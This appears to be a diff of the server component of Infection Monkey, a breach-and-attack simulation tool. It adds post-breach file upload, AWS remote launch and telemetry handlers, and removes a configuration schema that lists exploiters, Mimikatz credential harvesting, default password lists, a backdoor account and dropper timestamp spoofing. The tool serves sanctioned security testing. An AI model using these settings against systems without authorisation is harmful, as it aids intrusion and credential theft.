        return jsonify(schema=ConfigService.get_config_schema(),
                       configuration=ConfigService.get_config(False, True, True))

    @jwt_required()
    def post(self):
        config_json = json.loads(request.data)
        if 'reset' in config_json:
            ConfigService.reset_config()
        else:
            if not ConfigService.update_config(config_json, should_encrypt=True):
                abort(400)
        return self.get()
@@ -0,0 +1,14 @@
import flask_restful
from flask import send_from_directory
from cc.resources.pba_file_upload import GET_FILE_DIR

__author__ = 'VakarisZ'


class PBAFileDownload(flask_restful.Resource):
    """
    File download endpoint used by monkey to download user's PBA file
    """
    # Used by monkey. can't secure.
    def get(self, path):
        return send_from_directory(GET_FILE_DIR, path)
@@ -0,0 +1,83 @@
import flask_restful
from flask import request, send_from_directory, Response
from cc.services.config import ConfigService
from cc.services.post_breach_files import PBA_WINDOWS_FILENAME_PATH, PBA_LINUX_FILENAME_PATH, UPLOADS_DIR
from cc.auth import jwt_required
import os
from werkzeug.utils import secure_filename
import logging
import copy

__author__ = 'VakarisZ'

LOG = logging.getLogger(__name__)
GET_FILE_DIR = "./userUploads"
# Front end uses these strings to identify which files to work with (linux or windows)
LINUX_PBA_TYPE = 'PBAlinux'
WINDOWS_PBA_TYPE = 'PBAwindows'


class FileUpload(flask_restful.Resource):
    """
    File upload endpoint used to exchange files with filepond component on the front-end
    """
    @jwt_required()
    def get(self, file_type):
        """
        Sends file to filepond
        :param file_type: Type indicates which file to send, linux or windows
        :return: Returns file contents
        """
        # Verify that file_name is indeed a file from config
        if file_type == LINUX_PBA_TYPE:
            filename = ConfigService.get_config_value(copy.deepcopy(PBA_LINUX_FILENAME_PATH))
        else:
            filename = ConfigService.get_config_value(copy.deepcopy(PBA_WINDOWS_FILENAME_PATH))
        return send_from_directory(GET_FILE_DIR, filename)

    @jwt_required()
    def post(self, file_type):
        """
        Receives user's uploaded file from filepond
        :param file_type: Type indicates which file was received, linux or windows
        :return: Returns flask response object with uploaded file's filename
        """
        filename = FileUpload.upload_pba_file(request, (file_type == LINUX_PBA_TYPE))

        response = Response(
            response=filename,
            status=200, mimetype='text/plain')
        return response

    @jwt_required()
    def delete(self, file_type):
        """
        Deletes file that has been deleted on the front end
        :param file_type: Type indicates which file was deleted, linux or windows
        :return: Empty response
        """
        filename_path = PBA_LINUX_FILENAME_PATH if file_type == 'PBAlinux' else PBA_WINDOWS_FILENAME_PATH
        filename = ConfigService.get_config_value(filename_path)
        file_path = os.path.join(UPLOADS_DIR, filename)
        try:
            if os.path.exists(file_path):
                os.remove(file_path)
            ConfigService.set_config_value(filename_path, '')
        except OSError as e:
            LOG.error("Can't remove previously uploaded post breach files: %s" % e)

        return {}

    @staticmethod
    def upload_pba_file(request_, is_linux=True):
        """
        Uploads PBA file to island's file system
        :param request_: Request object containing PBA file
        :param is_linux: Boolean indicating if this file is for windows or for linux
        :return: filename string
        """
        filename = secure_filename(request_.files['filepond'].filename)
        file_path = os.path.join(UPLOADS_DIR, filename)
        request_.files['filepond'].save(file_path)
        ConfigService.set_config_value((PBA_LINUX_FILENAME_PATH if is_linux else PBA_WINDOWS_FILENAME_PATH), filename)
        return filename
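For illustration (not from the commit), a client could exercise this upload endpoint roughly as follows; the island address, the flask-jwt 'JWT <token>' header scheme and the self-signed-certificate handling are assumptions.

import requests


def upload_linux_pba(island, token, path):
    # Hypothetical client call: filepond submits the file under the multipart field
    # 'filepond', which upload_pba_file() reads; 'PBAlinux' selects the Linux PBA slot.
    with open(path, 'rb') as f:
        resp = requests.post('https://%s/api/fileUpload/PBAlinux' % island,
                             files={'filepond': f},
                             headers={'Authorization': 'JWT %s' % token},  # assumed auth scheme
                             verify=False)  # assumed self-signed island certificate
    return resp.text  # the endpoint answers with the stored filename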
@@ -0,0 +1,48 @@
import json
from flask import request, jsonify, make_response
import flask_restful

from cc.auth import jwt_required
from cc.services.remote_run_aws import RemoteRunAwsService
from common.cloud.aws_service import AwsService


class RemoteRun(flask_restful.Resource):
    def __init__(self):
        super(RemoteRun, self).__init__()
        RemoteRunAwsService.init()

    def run_aws_monkeys(self, request_body):
        instances = request_body.get('instances')
        island_ip = request_body.get('island_ip')
        return RemoteRunAwsService.run_aws_monkeys(instances, island_ip)

    @jwt_required()
    def get(self):
        action = request.args.get('action')
        if action == 'list_aws':
            is_aws = RemoteRunAwsService.is_running_on_aws()
            resp = {'is_aws': is_aws}
            if is_aws:
                is_auth = RemoteRunAwsService.update_aws_auth_params()
                resp['auth'] = is_auth
                if is_auth:
                    resp['instances'] = AwsService.get_instances()
            return jsonify(resp)

        return {}

    @jwt_required()
    def post(self):
        body = json.loads(request.data)
        resp = {}
        if body.get('type') == 'aws':
            is_auth = RemoteRunAwsService.update_aws_auth_params()
            resp['auth'] = is_auth
            if is_auth:
                result = self.run_aws_monkeys(body)
                resp['result'] = result
            return jsonify(resp)

        # default action
        return make_response({'error': 'Invalid action'}, 500)
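For orientation (an assumption pieced together from post() and run_aws_monkeys() above, not from the commit), the request the UI would send to start monkeys on AWS instances is shaped roughly like this; only the top-level keys 'type', 'instances' and 'island_ip' come from the code, the per-instance fields and addresses are hypothetical.

import json

import requests

# Hypothetical body for POST /api/remote-monkey: post() checks type == 'aws',
# run_aws_monkeys() reads 'instances' and 'island_ip'.
body = {
    'type': 'aws',
    'island_ip': '10.0.0.10',
    'instances': [{'instance_id': 'i-0123456789abcdef0', 'os': 'linux'}],  # fields assumed
}
requests.post('https://%s/api/remote-monkey' % '10.0.0.10',  # island address assumed
              data=json.dumps(body),
              headers={'Authorization': 'JWT <token>', 'content-type': 'application/json'},
              verify=False)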
@@ -10,6 +10,7 @@ from cc.services.config import ConfigService
from cc.services.node import NodeService
from cc.services.report import ReportService
from cc.utils import local_ip_addresses
+from cc.services.post_breach_files import remove_PBA_files

__author__ = 'Barak'

@@ -42,6 +43,7 @@ class Root(flask_restful.Resource):
    @staticmethod
    @jwt_required()
    def reset_db():
+        remove_PBA_files()
        # We can't drop system collections.
        [mongo.db[x].drop() for x in mongo.db.collection_names() if not x.startswith('system.')]
        ConfigService.init_config()
@@ -65,5 +67,7 @@ class Root(flask_restful.Resource):
        if not infection_done:
            report_done = False
        else:
+            if is_any_exists:
+                ReportService.get_report()
            report_done = ReportService.is_report_generated()
        return dict(run_server=True, run_monkey=is_any_exists, infection_done=infection_done, report_done=report_done)
@@ -90,10 +90,11 @@ class Telemetry(flask_restful.Resource):
    @staticmethod
    def get_edge_by_scan_or_exploit_telemetry(telemetry_json):
        dst_ip = telemetry_json['data']['machine']['ip_addr']
+        dst_domain_name = telemetry_json['data']['machine']['domain_name']
        src_monkey = NodeService.get_monkey_by_guid(telemetry_json['monkey_guid'])
        dst_node = NodeService.get_monkey_by_ip(dst_ip)
        if dst_node is None:
-            dst_node = NodeService.get_or_create_node(dst_ip)
+            dst_node = NodeService.get_or_create_node(dst_ip, dst_domain_name)

        return EdgeService.get_or_create_edge(src_monkey["_id"], dst_node["_id"])
@ -144,30 +145,29 @@ class Telemetry(flask_restful.Resource):
|
||||||
edge = Telemetry.get_edge_by_scan_or_exploit_telemetry(telemetry_json)
|
edge = Telemetry.get_edge_by_scan_or_exploit_telemetry(telemetry_json)
|
||||||
data = copy.deepcopy(telemetry_json['data']['machine'])
|
data = copy.deepcopy(telemetry_json['data']['machine'])
|
||||||
ip_address = data.pop("ip_addr")
|
ip_address = data.pop("ip_addr")
|
||||||
|
domain_name = data.pop("domain_name")
|
||||||
new_scan = \
|
new_scan = \
|
||||||
{
|
{
|
||||||
"timestamp": telemetry_json["timestamp"],
|
"timestamp": telemetry_json["timestamp"],
|
||||||
"data": data,
|
"data": data
|
||||||
"scanner": telemetry_json['data']['scanner']
|
|
||||||
}
|
}
|
||||||
mongo.db.edge.update(
|
mongo.db.edge.update(
|
||||||
{"_id": edge["_id"]},
|
{"_id": edge["_id"]},
|
||||||
{"$push": {"scans": new_scan},
|
{"$push": {"scans": new_scan},
|
||||||
"$set": {"ip_address": ip_address}}
|
"$set": {"ip_address": ip_address, 'domain_name': domain_name}}
|
||||||
)
|
)
|
||||||
|
|
||||||
node = mongo.db.node.find_one({"_id": edge["to"]})
|
node = mongo.db.node.find_one({"_id": edge["to"]})
|
||||||
if node is not None:
|
if node is not None:
|
||||||
if new_scan["scanner"] == "TcpScanner":
|
scan_os = new_scan["data"]["os"]
|
||||||
scan_os = new_scan["data"]["os"]
|
if "type" in scan_os:
|
||||||
if "type" in scan_os:
|
mongo.db.node.update({"_id": node["_id"]},
|
||||||
mongo.db.node.update({"_id": node["_id"]},
|
{"$set": {"os.type": scan_os["type"]}},
|
||||||
{"$set": {"os.type": scan_os["type"]}},
|
upsert=False)
|
||||||
upsert=False)
|
if "version" in scan_os:
|
||||||
if "version" in scan_os:
|
mongo.db.node.update({"_id": node["_id"]},
|
||||||
mongo.db.node.update({"_id": node["_id"]},
|
{"$set": {"os.version": scan_os["version"]}},
|
||||||
{"$set": {"os.version": scan_os["version"]}},
|
upsert=False)
|
||||||
upsert=False)
|
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def process_system_info_telemetry(telemetry_json):
|
def process_system_info_telemetry(telemetry_json):
|
||||||
|
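After this change a scan entry pushed onto an edge no longer carries a 'scanner' field, and 'ip_addr'/'domain_name' are popped out of the machine data and stored on the edge itself. A hedged sketch of the resulting documents follows; the field names come from the code above, the values and the exact set of remaining machine fields are invented.

# Illustrative shapes only; concrete values are made up.
new_scan_example = {
    "timestamp": "2019-01-01T00:00:00",
    "data": {                       # machine data with ip_addr and domain_name already popped out
        "os": {"type": "linux", "version": "Ubuntu"},
        "services": {}
    }
}
edge_update_example = {
    "$push": {"scans": new_scan_example},
    "$set": {"ip_address": "10.0.0.7", "domain_name": "victim.local"}
}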
@@ -191,6 +191,10 @@ class Telemetry(flask_restful.Resource):
         if 'wmi' in telemetry_json['data']:
             wmi_handler = WMIHandler(monkey_id, telemetry_json['data']['wmi'], users_secrets)
             wmi_handler.process_and_handle_wmi_info()
+        if 'aws' in telemetry_json['data']:
+            if 'instance_id' in telemetry_json['data']['aws']:
+                mongo.db.monkey.update_one({'_id': monkey_id},
+                                           {'$set': {'aws_instance_id': telemetry_json['data']['aws']['instance_id']}})

     @staticmethod
     def add_ip_to_ssh_keys(ip, ssh_info):

@@ -253,6 +257,11 @@ class Telemetry(flask_restful.Resource):
                 if len(credential) > 0:
                     attempts[i][field] = encryptor.enc(credential.encode('utf-8'))

+    @staticmethod
+    def process_post_breach_telemetry(telemetry_json):
+        mongo.db.monkey.update(
+            {'guid': telemetry_json['monkey_guid']},
+            {'$push': {'pba_results': telemetry_json['data']}})

 TELEM_PROCESS_DICT = \
     {

@@ -261,5 +270,6 @@ TELEM_PROCESS_DICT = \
         'exploit': Telemetry.process_exploit_telemetry,
         'scan': Telemetry.process_scan_telemetry,
         'system_info_collection': Telemetry.process_system_info_telemetry,
-        'trace': Telemetry.process_trace_telemetry
+        'trace': Telemetry.process_trace_telemetry,
+        'post_breach': Telemetry.process_post_breach_telemetry
     }
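The new 'post_breach' processor above simply pushes the telemetry's data onto the monkey's pba_results list. A hedged example of such a record is shown below; the field names are taken from this handler and from get_post_breach_telem_brief in the telemetry feed further down, and all values are invented.

# Illustrative post-breach telemetry record; values are invented.
post_breach_telem_example = {
    'monkey_guid': '1234567890',
    'telem_type': 'post_breach',
    'data': {
        'name': 'BackdoorUser',      # PBA name, matching the BackdoorUser action in the new schema
        'hostname': 'victim-host',
        'ip': '10.0.0.5'
    }
}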
@@ -31,11 +31,13 @@ class TelemetryFeed(flask_restful.Resource):

     @staticmethod
     def get_displayed_telemetry(telem):
+        monkey = NodeService.get_monkey_by_guid(telem['monkey_guid'])
+        default_hostname = "GUID-" + telem['monkey_guid']
         return \
             {
                 'id': telem['_id'],
                 'timestamp': telem['timestamp'].strftime('%d/%m/%Y %H:%M:%S'),
-                'hostname': NodeService.get_monkey_by_guid(telem['monkey_guid'])['hostname'],
+                'hostname': monkey.get('hostname', default_hostname) if monkey else default_hostname,
                 'brief': TELEM_PROCESS_DICT[telem['telem_type']](telem)
             }
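The hostname lookup above now tolerates telemetry whose monkey document is missing or has no hostname yet. A minimal sketch of the fallback behaviour, with invented sample values:

# Minimal sketch of the hostname fallback; sample values are invented.
telem = {'monkey_guid': 'abcd-1234'}
monkey = None                                   # e.g. telemetry arrived before the monkey registered
default_hostname = "GUID-" + telem['monkey_guid']
hostname = monkey.get('hostname', default_hostname) if monkey else default_hostname
print(hostname)                                 # -> GUID-abcd-1234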
@@ -52,7 +54,7 @@ class TelemetryFeed(flask_restful.Resource):
     @staticmethod
     def get_state_telem_brief(telem):
         if telem['data']['done']:
-            return 'Monkey died.'
+            return '''Monkey finishing it's execution.'''
         else:
             return 'Monkey started.'

@@ -78,6 +80,12 @@ class TelemetryFeed(flask_restful.Resource):
     def get_trace_telem_brief(telem):
         return 'Monkey reached max depth.'

+    @staticmethod
+    def get_post_breach_telem_brief(telem):
+        return '%s post breach action executed on %s (%s) machine' % (telem['data']['name'],
+                                                                      telem['data']['hostname'],
+                                                                      telem['data']['ip'])
+

 TELEM_PROCESS_DICT = \
     {

@@ -86,5 +94,6 @@ TELEM_PROCESS_DICT = \
         'exploit': TelemetryFeed.get_exploit_telem_brief,
         'scan': TelemetryFeed.get_scan_telem_brief,
         'system_info_collection': TelemetryFeed.get_systeminfo_telem_brief,
-        'trace': TelemetryFeed.get_trace_telem_brief
+        'trace': TelemetryFeed.get_trace_telem_brief,
+        'post_breach': TelemetryFeed.get_post_breach_telem_brief
     }
@@ -0,0 +1 @@
+__author__ = 'VakarisZ'

@@ -0,0 +1,19 @@
+"""
+File that contains ATT&CK telemetry storing/retrieving logic
+"""
+import logging
+from cc.database import mongo
+
+__author__ = "VakarisZ"
+
+logger = logging.getLogger(__name__)
+
+
+def set_results(technique, data):
+    """
+    Adds ATT&CK technique results(telemetry) to the database
+    :param technique: technique ID string e.g. T1110
+    :param data: Data, relevant to the technique
+    """
+    data.update({'technique': technique})
+    mongo.db.attack_results.insert(data)
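A minimal usage sketch for set_results, assuming the Island's Mongo connection is initialised; the technique ID comes from the docstring's example and the payload fields are invented:

# Hedged usage sketch; requires the Island's Mongo connection to be initialised.
set_results('T1110', {'machine': {'ip_addr': '10.0.0.5'}, 'status': 'attempted'})
# The stored document then carries the technique ID alongside the data, e.g.:
# {'technique': 'T1110', 'machine': {'ip_addr': '10.0.0.5'}, 'status': 'attempted'}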
@@ -4,870 +4,18 @@ import functools
 import logging
 from jsonschema import Draft4Validator, validators
 from six import string_types

+import cc.services.post_breach_files
 from cc.database import mongo
 from cc.encryptor import encryptor
 from cc.environment.environment import env
 from cc.utils import local_ip_addresses
+from config_schema import SCHEMA

 __author__ = "itay.mizeretz"

 logger = logging.getLogger(__name__)

-WARNING_SIGN = u" \u26A0"
-
-SCHEMA = {
-    "title": "Monkey",
-    "type": "object",
-    "definitions": {
-        "exploiter_classes": {
-            "title": "Exploit class",
-            "type": "string",
-            "anyOf": [
-                {"type": "string", "enum": ["SmbExploiter"], "title": "SMB Exploiter"},
-                {"type": "string", "enum": ["WmiExploiter"], "title": "WMI Exploiter"},
-                {"type": "string", "enum": ["RdpExploiter"], "title": "RDP Exploiter (UNSAFE)"},
-                {"type": "string", "enum": ["Ms08_067_Exploiter"], "title": "MS08-067 Exploiter (UNSAFE)"},
-                {"type": "string", "enum": ["SSHExploiter"], "title": "SSH Exploiter"},
-                {"type": "string", "enum": ["ShellShockExploiter"], "title": "ShellShock Exploiter"},
-                {"type": "string", "enum": ["SambaCryExploiter"], "title": "SambaCry Exploiter"},
-                {"type": "string", "enum": ["ElasticGroovyExploiter"], "title": "ElasticGroovy Exploiter"},
-                {"type": "string", "enum": ["Struts2Exploiter"], "title": "Struts2 Exploiter"},
-                {"type": "string", "enum": ["WebLogicExploiter"], "title": "Oracle Web Logic Exploiter"},
-                {"type": "string", "enum": ["HadoopExploiter"], "title": "Hadoop/Yarn Exploiter"}
-            ]
-        },
-        "finger_classes": {
-            "title": "Fingerprint class",
-            "type": "string",
-            "anyOf": [
-                {"type": "string", "enum": ["SMBFinger"], "title": "SMBFinger"},
-                {"type": "string", "enum": ["SSHFinger"], "title": "SSHFinger"},
-                {"type": "string", "enum": ["PingScanner"], "title": "PingScanner"},
-                {"type": "string", "enum": ["HTTPFinger"], "title": "HTTPFinger"},
-                {"type": "string", "enum": ["MySQLFinger"], "title": "MySQLFinger"},
-                {"type": "string", "enum": ["MSSQLFinger"], "title": "MSSQLFinger"},
-                {"type": "string", "enum": ["ElasticFinger"], "title": "ElasticFinger"}
-            ]
-        }
-    },
-    "properties": {
-        "basic": {
-            "title": "Basic - Credentials",
-            "type": "object",
-            "properties": {
-                "credentials": {
-                    "title": "Credentials",
-                    "type": "object",
-                    "properties": {
-                        "exploit_user_list": {"title": "Exploit user list", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": ["Administrator", "root", "user"], "description": "List of usernames to use on exploits using credentials"},
-                        "exploit_password_list": {"title": "Exploit password list", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": ["Password1!", "1234", "password", "12345678"], "description": "List of password to use on exploits using credentials"}
-                    }
-                }
-            }
-        },
-        "basic_network": {
-            "title": "Basic - Network",
-            "type": "object",
-            "properties": {
-                "general": {
-                    "title": "General",
-                    "type": "object",
-                    "properties": {
-                        "blocked_ips": {"title": "Blocked IPs", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": [], "description": "List of IPs to not scan"},
-                        "local_network_scan": {"title": "Local network scan", "type": "boolean", "default": True, "description": "Determines whether the monkey should scan its subnets additionally"},
-                        "depth": {"title": "Distance from island", "type": "integer", "default": 2, "description": "Amount of hops allowed for the monkey to spread from the island. " + WARNING_SIGN + " Note that setting this value too high may result in the monkey propagating too far"},
-                        "subnet_scan_list": {"title": "Scan IP/subnet list", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": [], "description": "List of IPs/subnets the monkey should scan. Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\""}
-                    }
-                },
-                "network_analysis": {
-                    "title": "Network Analysis",
-                    "type": "object",
-                    "properties": {
-                        "inaccessible_subnets": {"title": "Network segmentation testing", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": [], "description": "Test for network segmentation by providing a list of subnets that should NOT be accessible to each other. For example, given the following configuration: '10.0.0.0/24, 11.0.0.2/32, 12.2.3.0/24' a Monkey running on 10.0.0.5 will try to access machines in the following subnets: 11.0.0.2/32, 12.2.3.0/24. An alert on successful connections will be shown in the report Additional subnet formats include: 13.0.0.1, 13.0.0.1-13.0.0.5"}
-                    }
-                }
-            }
-        },
-        "monkey": {
-            "title": "Monkey",
-            "type": "object",
-            "properties": {
-                "general": {
-                    "title": "General",
-                    "type": "object",
-                    "properties": {
-                        "alive": {"title": "Alive", "type": "boolean", "default": True, "description": "Is the monkey alive"}
-                    }
-                },
-                "behaviour": {
-                    "title": "Behaviour",
-                    "type": "object",
-                    "properties": {
-                        "self_delete_in_cleanup": {"title": "Self delete on cleanup", "type": "boolean", "default": False, "description": "Should the monkey delete its executable when going down"},
-                        "use_file_logging": {"title": "Use file logging", "type": "boolean", "default": True, "description": "Should the monkey dump to a log file"},
-                        "serialize_config": {"title": "Serialize config", "type": "boolean", "default": False, "description": "Should the monkey dump its config on startup"}
-                    }
-                },
-                "system_info": {
-                    "title": "System info",
-                    "type": "object",
-                    "properties": {
-                        "extract_azure_creds": {"title": "Harvest Azure Credentials", "type": "boolean", "default": True, "description": "Determine if the Monkey should try to harvest password credentials from Azure VMs"},
-                        "collect_system_info": {"title": "Collect system info", "type": "boolean", "default": True, "description": "Determines whether to collect system info"},
-                        "should_use_mimikatz": {"title": "Should use Mimikatz", "type": "boolean", "default": True, "description": "Determines whether to use Mimikatz"},
-                    }
-                },
-                "life_cycle": {
-                    "title": "Life cycle",
-                    "type": "object",
-                    "properties": {
-                        "max_iterations": {"title": "Max iterations", "type": "integer", "default": 1, "description": "Determines how many iterations of the monkey's full lifecycle should occur"},
-                        "victims_max_find": {"title": "Max victims to find", "type": "integer", "default": 30, "description": "Determines the maximum number of machines the monkey is allowed to scan"},
-                        "victims_max_exploit": {"title": "Max victims to exploit", "type": "integer", "default": 7, "description": "Determines the maximum number of machines the monkey is allowed to successfully exploit. " + WARNING_SIGN + " Note that setting this value too high may result in the monkey propagating to a high number of machines"},
-                        "timeout_between_iterations": {"title": "Wait time between iterations", "type": "integer", "default": 100, "description": "Determines for how long (in seconds) should the monkey wait between iterations"},
-                        "retry_failed_explotation": {"title": "Retry failed exploitation", "type": "boolean", "default": True, "description": "Determines whether the monkey should retry exploiting machines it didn't successfuly exploit on previous iterations"}
-                    }
-                }
-            }
-        },
-        "internal": {
-            "title": "Internal",
-            "type": "object",
-            "properties": {
-                "general": {
-                    "title": "General",
-                    "type": "object",
-                    "properties": {
-                        "singleton_mutex_name": {"title": "Singleton mutex name", "type": "string", "default": "{2384ec59-0df8-4ab9-918c-843740924a28}", "description": "The name of the mutex used to determine whether the monkey is already running"},
-                        "keep_tunnel_open_time": {"title": "Keep tunnel open time", "type": "integer", "default": 60, "description": "Time to keep tunnel open before going down after last exploit (in seconds)"}
-                    }
-                },
-                "classes": {
-                    "title": "Classes",
-                    "type": "object",
-                    "properties": {
-                        "scanner_class": {"title": "Scanner class", "type": "string", "default": "TcpScanner", "enum": ["TcpScanner"], "enumNames": ["TcpScanner"], "description": "Determines class to scan for machines. (Shouldn't be changed)"},
-                        "finger_classes": {"title": "Fingerprint classes", "type": "array", "uniqueItems": True, "items": {"$ref": "#/definitions/finger_classes"}, "default": ["SMBFinger", "SSHFinger", "PingScanner", "HTTPFinger", "MySQLFinger", "MSSQLFinger", "ElasticFinger"], "description": "Determines which classes to use for fingerprinting"}
-                    }
-                },
-                "kill_file": {
-                    "title": "Kill file",
-                    "type": "object",
-                    "properties": {
-                        "kill_file_path_windows": {"title": "Kill file path on Windows", "type": "string", "default": "%windir%\\monkey.not", "description": "Path of file which kills monkey if it exists (on Windows)"},
-                        "kill_file_path_linux": {"title": "Kill file path on Linux", "type": "string", "default": "/var/run/monkey.not", "description": "Path of file which kills monkey if it exists (on Linux)"}
-                    }
-                },
-                "dropper": {
-                    "title": "Dropper",
-                    "type": "object",
-                    "properties": {
-                        "dropper_set_date": {"title": "Dropper sets date", "type": "boolean", "default": True, "description": "Determines whether the dropper should set the monkey's file date to be the same as another file"},
-                        "dropper_date_reference_path_windows": {"title": "Dropper date reference path (Windows)", "type": "string", "default": "%windir%\\system32\\kernel32.dll", "description": "Determines which file the dropper should copy the date from if it's configured to do so on Windows (use fullpath)"},
-                        "dropper_date_reference_path_linux": {"title": "Dropper date reference path (Linux)", "type": "string", "default": "/bin/sh", "description": "Determines which file the dropper should copy the date from if it's configured to do so on Linux (use fullpath)"},
-                        "dropper_target_path_linux": {"title": "Dropper target path on Linux", "type": "string", "default": "/tmp/monkey", "description": "Determines where should the dropper place the monkey on a Linux machine"},
-                        "dropper_target_path_win_32": {"title": "Dropper target path on Windows (32bit)", "type": "string", "default": "C:\\Windows\\monkey32.exe", "description": "Determines where should the dropper place the monkey on a Windows machine (32bit)"},
-                        "dropper_target_path_win_64": {"title": "Dropper target path on Windows (64bit)", "type": "string", "default": "C:\\Windows\\monkey64.exe", "description": "Determines where should the dropper place the monkey on a Windows machine (64 bit)"},
-                        "dropper_try_move_first": {"title": "Try to move first", "type": "boolean", "default": True, "description": "Determines whether the dropper should try to move itsel instead of copying itself to target path"}
-                    }
-                },
-                "logging": {
-                    "title": "Logging",
-                    "type": "object",
-                    "properties": {
-                        "dropper_log_path_linux": {"title": "Dropper log file path on Linux", "type": "string", "default": "/tmp/user-1562", "description": "The fullpath of the dropper log file on Linux"},
-                        "dropper_log_path_windows": {"title": "Dropper log file path on Windows", "type": "string", "default": "%temp%\\~df1562.tmp", "description": "The fullpath of the dropper log file on Windows"},
-                        "monkey_log_path_linux": {"title": "Monkey log file path on Linux", "type": "string", "default": "/tmp/user-1563", "description": "The fullpath of the monkey log file on Linux"},
-                        "monkey_log_path_windows": {"title": "Monkey log file path on Windows", "type": "string", "default": "%temp%\\~df1563.tmp", "description": "The fullpath of the monkey log file on Windows"},
-                        "send_log_to_server": {"title": "Send log to server", "type": "boolean", "default": True, "description": "Determines whether the monkey sends its log to the Monkey Island server"}
-                    }
-                },
-                "exploits": {
-                    "title": "Exploits",
-                    "type": "object",
-                    "properties": {
-                        "exploit_lm_hash_list": {"title": "Exploit LM hash list", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": [], "description": "List of LM hashes to use on exploits using credentials"},
-                        "exploit_ntlm_hash_list": {"title": "Exploit NTLM hash list", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": [], "description": "List of NTLM hashes to use on exploits using credentials"},
-                        "exploit_ssh_keys": {"title": "SSH key pairs list", "type": "array", "uniqueItems": True, "default": [], "items": {"type": "string"}, "description": "List of SSH key pairs to use, when trying to ssh into servers"}
-                    }
-                }
-            }
-        },
-        "cnc": {
-            "title": "Monkey Island",
-            "type": "object",
-            "properties": {
-                "servers": {
-                    "title": "Servers",
-                    "type": "object",
-                    "properties": {
-                        "command_servers": {"title": "Command servers", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": ["192.0.2.0:5000"], "description": "List of command servers to try and communicate with (format is <ip>:<port>)"},
-                        "internet_services": {"title": "Internet services", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": ["monkey.guardicore.com", "www.google.com"], "description": "List of internet services to try and communicate with to determine internet connectivity (use either ip or domain)"},
-                        "current_server": {"title": "Current server", "type": "string", "default": "192.0.2.0:5000", "description": "The current command server the monkey is communicating with"}
-                    }
-                }
-            }
-        },
-        "exploits": {
-            "title": "Exploits",
-            "type": "object",
-            "properties": {
-                "general": {
-                    "title": "General",
-                    "type": "object",
-                    "properties": {
-                        "exploiter_classes": {"title": "Exploits", "type": "array", "uniqueItems": True, "items": {"$ref": "#/definitions/exploiter_classes"}, "default": ["SmbExploiter", "WmiExploiter", "SSHExploiter", "ShellShockExploiter", "SambaCryExploiter", "ElasticGroovyExploiter", "Struts2Exploiter", "WebLogicExploiter", "HadoopExploiter"], "description": "Determines which exploits to use. " + WARNING_SIGN + " Note that using unsafe exploits may cause crashes of the exploited machine/service"},
-                        "skip_exploit_if_file_exist": {"title": "Skip exploit if file exists", "type": "boolean", "default": False, "description": "Determines whether the monkey should skip the exploit if the monkey's file is already on the remote machine"}
-                    }
-                },
-                "ms08_067": {
-                    "title": "MS08_067",
-                    "type": "object",
-                    "properties": {
-                        "ms08_067_exploit_attempts": {"title": "MS08_067 exploit attempts", "type": "integer", "default": 5, "description": "Number of attempts to exploit using MS08_067"},
-                        "ms08_067_remote_user_add": {"title": "MS08_067 remote user", "type": "string", "default": "Monkey_IUSER_SUPPORT", "description": "Username to add on successful exploit"},
-                        "ms08_067_remote_user_pass": {"title": "MS08_067 remote user password", "type": "string", "default": "Password1!", "description": "Password to use for created user"}
-                    }
-                },
-                "rdp_grinder": {
-                    "title": "RDP grinder",
-                    "type": "object",
-                    "properties": {
-                        "rdp_use_vbs_download": {"title": "Use VBS download", "type": "boolean", "default": True, "description": "Determines whether to use VBS or BITS to download monkey to remote machine (true=VBS, false=BITS)"}
-                    }
-                },
-                "sambacry": {
-                    "title": "SambaCry",
-                    "type": "object",
-                    "properties": {
-                        "sambacry_trigger_timeout": {"title": "SambaCry trigger timeout", "type": "integer", "default": 5, "description": "Timeout (in seconds) of SambaCry trigger"},
-                        "sambacry_folder_paths_to_guess": {"title": "SambaCry folder paths to guess", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": ['/', '/mnt', '/tmp', '/storage', '/export', '/share', '/shares', '/home'], "description": "List of full paths to share folder for SambaCry to guess"},
-                        "sambacry_shares_not_to_check": {"title": "SambaCry shares not to check", "type": "array", "uniqueItems": True, "items": {"type": "string"}, "default": ["IPC$", "print$"], "description": "These shares won't be checked when exploiting with SambaCry"}
-                    }
-                },
-                "smb_service": {
-                    "title": "SMB service",
-                    "type": "object",
-                    "properties": {
-                        "smb_download_timeout": {"title": "SMB download timeout", "type": "integer", "default": 300, "description": "Timeout (in seconds) for SMB download operation (used in various exploits using SMB)"},
-                        "smb_service_name": {"title": "SMB service name", "type": "string", "default": "InfectionMonkey", "description": "Name of the SMB service that will be set up to download monkey"}
-                    }
-                }
-            }
-        },
-        "network": {
-            "title": "Network",
-            "type": "object",
-            "properties": {
-                "tcp_scanner": {
-                    "title": "TCP scanner",
-                    "type": "object",
-                    "properties": {
-                        "HTTP_PORTS": {"title": "HTTP ports", "type": "array", "uniqueItems": True, "items": {"type": "integer"}, "default": [80, 8080, 443, 8008, 7001], "description": "List of ports the monkey will check if are being used for HTTP"},
-                        "tcp_target_ports": {"title": "TCP target ports", "type": "array", "uniqueItems": True, "items": {"type": "integer"}, "default": [22, 2222, 445, 135, 3389, 80, 8080, 443, 8008, 3306, 9200, 7001], "description": "List of TCP ports the monkey will check whether they're open"},
-                        "tcp_scan_interval": {"title": "TCP scan interval", "type": "integer", "default": 200, "description": "Time to sleep (in milliseconds) between scans"},
-                        "tcp_scan_timeout": {"title": "TCP scan timeout", "type": "integer", "default": 3000, "description": "Maximum time (in milliseconds) to wait for TCP response"},
-                        "tcp_scan_get_banner": {"title": "TCP scan - get banner", "type": "boolean", "default": True, "description": "Determines whether the TCP scan should try to get the banner"}
-                    }
-                },
-                "ping_scanner": {
-                    "title": "Ping scanner",
-                    "type": "object",
-                    "properties": {
-                        "ping_scan_timeout": {"title": "Ping scan timeout", "type": "integer", "default": 1000, "description": "Maximum time (in milliseconds) to wait for ping response"}
-                    }
-                }
-            }
-        }
-    },
-    "options": {
-        "collapsed": True
-    }
-}
-
